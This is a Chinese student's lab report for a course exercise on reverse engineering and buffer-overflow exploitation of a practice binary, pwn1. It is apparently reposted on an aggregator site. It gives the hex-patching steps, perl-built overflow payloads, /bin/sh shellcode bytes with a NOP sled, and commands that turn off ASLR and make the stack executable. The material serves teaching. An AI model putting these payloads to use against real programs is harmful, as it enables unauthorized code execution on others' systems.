Exp1 PC平台逆向破解(5)M
2018-03-09 12:57
399 查看
Exp1 PC平台逆向破解(5)M
实践内容
实践对象是一个可执行文件pwn1本程序的正常执行顺序应该是main函数调用foo函数,foo函数输出用户输入的字符串。
本程序还包含了另一个代码片段getshell,会返回一个可用的shell值,在正常的执行状况中该段代码不会被执行,而我们此次实践的内容就是对可执行文件进行攻击,从而让程序执行到此段代码。
实践要求
2.1掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(0.5分) 2.2掌握反汇编与十六进制编程器 (0.5分) 2.3能正确修改机器指令改变程序执行流程(0.5分) 2.4能正确构造payload进行bof攻击(0.5分)
实践基础知识:
(1)NOP指令即“空指令”(机器码:90)。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。所以NOP指令自然也会占用执行一个指令的CPU时间片。
(2)JNE是一个条件转移指令(机器码:75)。当ZF=0,转至标号处执行。
(3)JE是一个条件转移指令(机器码:74)。如果相等则跳转。
(4)JMP是无条件转移指令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移Jmp word(机器码:FF)段间直接(远)转移Jmp far(机器码:EA)
(5)CMP为比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果(机器码:39)。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
实践过程
本次实践有三种实现方式
手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
注入一个自己制作的shellcode并运行这段shellcode。
手工修改可执行文件
再动手之前应该知道反汇编指令是
objdump -d pwn1(文件名)|more
动手之前应该准备好32位的执行环境
64位Kali无法顺利执行pwn1问题的解决方案
开始实践
对pwn1进行备份并将副本命名为自己学号"20155329"并用副本进行实践。 使用cp 命令进行复制,例如cp pwn1 20155329对可执行文件进行反汇编
objdump -d 20155329 | more
由反汇编结果可以看出
图一e8对应call命令
e8后的绿色部分为抵用的foo函数的偏移地址。
图二
main地址是080484af、
foo地址是08048491、
getshell的地址是0804847d。
综上所述
foo函数的地址为08048291,getshellh函数的地址为0804847d,用16进制的减法我们可以精确的算出getshell比foo低了14,也就在原来的基础上减去14即可。而在linux环境下,采用小端存储的方式,也就是说d7为低位,就是说将到d7减去14即可,也就是变成c3。,我们使用vim编辑器对地址进行修改。
使用vim打开可执行文件20155329
此时文本为乱码,用“%!xxd”指令将文本转换成16进制文件来进行操作。
**修改偏移地址后,使用“%!xxd -r”将16进制文件转换成原文件保存退出。
运行可执行文件20155329
通过构造输入参数,造成BOF攻击,改变程序执行流
在实践一的基础上来进行实践二大致思路是找到返回堆栈地址,gets hell将此地址覆盖,使程序执行getshell段的代码
使用gdb确定输入字符串哪几个字符会覆盖到返回地址
如果输入字符串2015532922222222333333334444444412345678,那 4444 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。
在实践一中知道getshell的地址是0804847d
getShell的内存地址,在未启用ALSR的主机上是固定不变的,通过反汇编时可以看到,即 0x804847d 。接下来要确认下字节序,简单说是输入 11111111222222223333333344444444\x08\x04\x84\x7d ,还是输入 11111111222222223333333344444444\x7d\x84\x04\x08 。
对比之前 eip 0x34333231 0x34333231 ,正确应用输入11111111222222223333333344444444\x7d\x84\x04\x08。
确定输入 11111111222222223333333344444444\x7d\x84\x04\x08来覆盖返回值。
构造输入字符串
由为我们没法通过键盘输入 \x7d\x84\x04\x08 这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
利用Perl构建input文件进行输入,键入指令 perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
注入Shellcode并执行
准备一段Shellcode
Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写准备工作
execstack -s pwn1 //设置堆栈可执行 execstack -q pwn1//查询文件的堆栈是否可执行 X pwn1 more /proc/sys/kernel/randomize_va_space 2 echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化 more /proc/sys/kernel/randomize_va_space 0
此处可参考缓冲区溢出实验学习
构造要注入的payload。
结构为:nops+shellcode+retaddr。nop一为是了填充,二是作为“着陆区/滑行区”。
我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode 上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。 特别提醒:最后一个字符千万不能是\x0a。不然下面的操作就做不了了。
注意结构
接下来寻找retaddr的地址了
1.打开一个终端注入这段攻击buf: (cat input_shellcode;cat) | ./pwn1 2.再开另外一个终端,用gdb来调试pwn1这个进程。 ps -ef | grep pwn1 //查看进程号 (gdb)attach pid 3. 设置断点来查看注入的buf地址 (gdb) disassemble foo 0x080484ae <+29>: ret //断在这,这时注入的东西都大堆栈上了 //ret完,就跳到我们覆盖的retaddr那个地方了 End of assembler dump. (gdb) break *0x080484ae Breakpoint 1 at 0x80484ae //在另外一个终端中按下回车,这就是前面为什么不能以\x0a来结束 input_shellcode的原因。 (gdb) c Continuing. Breakpoint 1, 0x080484ae in foo () (gdb) info r esp esp 0xffffd3ac 0xffffd3ac (gdb) x/16x 0xffffd3ac
此时知道我们的结构是:anything+retaddr+nops+shellcode。
所以shellcode紧挨着retaddr地址,所以shell code地址位0xffffd3ac+4 = 0xffffd3b0
perl -e 'print "A" x 32;print "\x20\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\xb0\xd3\xff\xff\x00"' > input_shellcode
成功了
实验中遇见的问题
共享文件夹无法正常使用
重新安装 VMware tools安装32位的运行库时出现问题
问题:无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)E: 无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它?”
解决办法:
sudo rm /var/cache/apt/archives/lock
sudo rm /var/lib/dpkg/lock
问题:关于更多Shellcode的知识,请参考Shellcode基础。Shellcode基础无法打开
实验收获和感想
收获:本次实验中学习了汇编相关知识,做到了能看懂基本汇编指令,地址的运算gdb调试。大概就是这些吧。感想,本次实验开始就遇见了大问题,在环境的搭建上出了好多问题,虽然都解决了,但是也花费了大部分的时间,在装vmtools的时候听信了安装一直回车,导致后面的共享文件夹无法使用等问题,重新安装也是同样的问题,重启后又不能使用,最后还是找到一个和我遇见同样问题的大佬,看完他的博客,去添加源,更新源,安装之后解决了这一问题 。所以说还是要细心细心再细心才能减少之后的麻烦。
什么是漏洞?漏洞有什么危害?
什么是漏洞漏洞是设计人员在设计过程中遗留下来 的一些缺陷,往往被不法分子利用,进 行攻击。所以一个程序越大,可能出现的漏洞就越多。
漏洞有什么危害
漏洞往往被不法分子利用,攻击用户计算机,非法获取,篡改,删除数据。反正就是做一些损人利己的事情,甚至损人不利己的事。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 20155208徐子涵 《网络对抗》Exp1 PC平台逆向破解
- 20155213 《网络攻防》 Exp1 PC平台逆向破解
- 20155312张竞予 Exp1 PC平台逆向破解(5)M
- 2017-2018-2 20155303『网络对抗技术』Exp1:PC平台逆向破解
- 20155203 杜可欣《网络对抗技术》Exp1 PC平台逆向破解
- 2017-2018-2 《网络对抗技术》 20155322 第二周 Exp1 PC平台逆向破解(5)M
- 2017-2018-2 20155315《网络对抗技术》Exp1:PC平台逆向破解
- 20155321 《网络攻防》 Exp1 PC平台逆向破解(5)M
- 2017-2018-2 《网络对抗技术》 20155302 第二周 Exp1 PC平台逆向破解(5)M
- 2018-3-7 20155317 王新玮 Exp1 PC平台逆向破解(5)M
- 网络对抗技术 2017-2018-2 20152515 Exp1 PC平台逆向破解(5)M
- 20155338《网络对抗技术》 Exp1 PC平台逆向破解
- 2017-2018-2 《网络对抗技术》 20155319 第二周 Exp1 PC平台逆向破解(5)M
- 20155306 白皎 《网络攻防》Exp1 PC平台逆向破解——逆向与Bof基础
- 20155326刘美岑 《网络对抗》Exp1 PC平台逆向破解
- 20155227《网络对抗》Exp1 PC平台逆向破解(5)M
- 20145218PC平台逆向破解
- 20145219《网络对抗》PC平台逆向破解
- 20145218张晓涵 PC平台逆向破解_advanced
- 20145201李子璇《网络对抗》PC平台逆向破解